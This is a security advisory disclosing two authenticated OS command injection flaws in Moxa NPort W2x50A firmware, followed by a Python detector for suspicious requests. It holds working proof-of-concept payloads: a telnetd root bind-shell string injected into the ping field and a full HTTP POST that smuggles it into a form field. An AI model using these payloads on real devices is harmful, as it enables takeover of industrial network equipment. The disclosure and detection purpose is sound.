| Title | Published | Views | Reporter |
|---|---|---|---|
| Moxa NPort W2x50A 2.1 OS Command Injection Vulnerability | 1 Dec 2018 00:00 | – | zdt |
| Moxa EDR-810 Command Injection Vulnerability (CNVD-2018-11722) | 15 May 2018 00:00 | – | cnvd |
| Moxa NPort W2x50A Operating System Command Injection Vulnerability | 4 Dec 2018 00:00 | – | cnvd |
| Moxa NPort W2x50A Operating System Command Injection Vulnerability | 10 Dec 2018 00:00 | – | cnvd |
| CVE-2017-12120 | 14 May 2018 20:00 | – | cve |
| CVE-2018-19659 | 6 Dec 2018 23:00 | – | cve |
| CVE-2018-19660 | 6 Dec 2018 23:00 | – | cve |
| CVE-2017-12120 | 14 May 2018 20:00 | – | cvelist |
| CVE-2018-19659 | 6 Dec 2018 23:00 | – | cvelist |
| CVE-2018-19660 | 6 Dec 2018 23:00 | – | cvelist |
`
Moxa NPort W2x50A products with firmware version 2.1 Build_17112017 or lower are vulnerable to several authenticated OS Command Injection vulnerabilities:
#1 Authenticated OS Command Injection in web server ping functionality
Reserved CVE ID: CVE-2018-19659
A specially crafted HTTP POST request to /goform/net_WebPingGetValue can result in running OS commands as the root user. Exploitation requires authentication. This is similar to CVE-2017-12120.
Proof-of-concept:
1. Authenticate to Moxa NPort W2x50A device.
2. Go to Main menu → System Management → Maintenance → Ping → Destination
3. Enter ;telnetd -l/bin/sh -p4444&;. in 'Destination' field
4. Connect to opened bind shell: nc $IP_ADDRESS 4444
#2 Authenticated OS Command Injection in web server wlan profile properties functionality
Reserved CVE ID: CVE-2018-19660
A specially crafted HTTP POST request to /goform/net_WebSettingProfileSecurity can result in running OS commands as the root user. Exploitation requires authentication.
Proof-of-concept (sample HTTP request opening bind shell on port 4444):
POST /goform/webSettingProfileSecurity?profileID=1 HTTP/1.1
Host: {IP:PORT}
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: SessionID={YOURSESSIONID}
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 309
Authentication=3&EAP_method=1&Username= ;telnetd -l/bin/sh -p4444&;
These vulnerabilities were fixed in the firmware version 2.2 Build_18082311.
https://www.moxa.com/support/download.aspx?type=support&id=14781
Best regards,
Maksim Khazov
`
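One way to flag the requests this advisory describes in captured HTTP traffic or proxy logs, as an added example that is not part of the original advisory or of any vendor code. The sample requests are constructed, `dest` is a hypothetical field name, and the metacharacter list is an assumption about what these fields should never contain.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Endpoints named in the advisory; both spellings of the second one appear there.
WATCHED_PATHS = {
    "/goform/net_WebPingGetValue",
    "/goform/net_WebSettingProfileSecurity",
    "/goform/webSettingProfileSecurity",
}
# Characters a shell treats as separators or substitutions. Assumption: none of
# them are expected in these fields, so a match is worth an analyst's look.
SHELL_META = re.compile(r"[;&|`\r\n]|\$\(")

def suspicious_fields(raw_request):
    """Return [(name, value)] for decoded form fields that contain shell
    metacharacters; [] if the request is not a POST to a watched endpoint."""
    head, _, body = raw_request.replace("\r\n", "\n").partition("\n\n")
    try:
        method, target, _version = head.split("\n", 1)[0].split(" ", 2)
    except ValueError:
        return []  # not a parseable request line
    url = urlsplit(target)
    if method != "POST" or url.path not in WATCHED_PATHS:
        return []
    # keep_blank_values=True keeps the fragment left behind when an unencoded
    # '&' splits a field: "dest=192.0.2.10&;" -> ("dest", ...), (";", "").
    fields = parse_qsl(url.query, keep_blank_values=True)
    fields += parse_qsl(body, keep_blank_values=True)
    return [(k, v) for k, v in fields if SHELL_META.search(k) or SHELL_META.search(v)]

def build_request(path, body, method="POST"):
    """Build a constructed sample request (not captured traffic)."""
    return (f"{method} {path} HTTP/1.1\r\nHost: 192.0.2.1\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + body)

# Constructed samples. "dest" is a hypothetical field name; the advisory does
# not give the ping form's parameter names.
PROFILE = "/goform/webSettingProfileSecurity?profileID=1"
SAMPLES = {
    "clean": build_request(PROFILE, "Authentication=3&EAP_method=1&Username=operator1"),
    "encoded": build_request(PROFILE, "Authentication=3&EAP_method=1&Username=op%3Buname+-a"),
    "raw_amp": build_request("/goform/net_WebPingGetValue", "dest=192.0.2.10&;"),
    "other_path": build_request("/goform/unrelated", "note=a%3Bb"),
}

if __name__ == "__main__":
    for name, req in SAMPLES.items():
        print(name, suspicious_fields(req))
```

A hit only marks a request for review; devices still need the fixed firmware version named in the advisory.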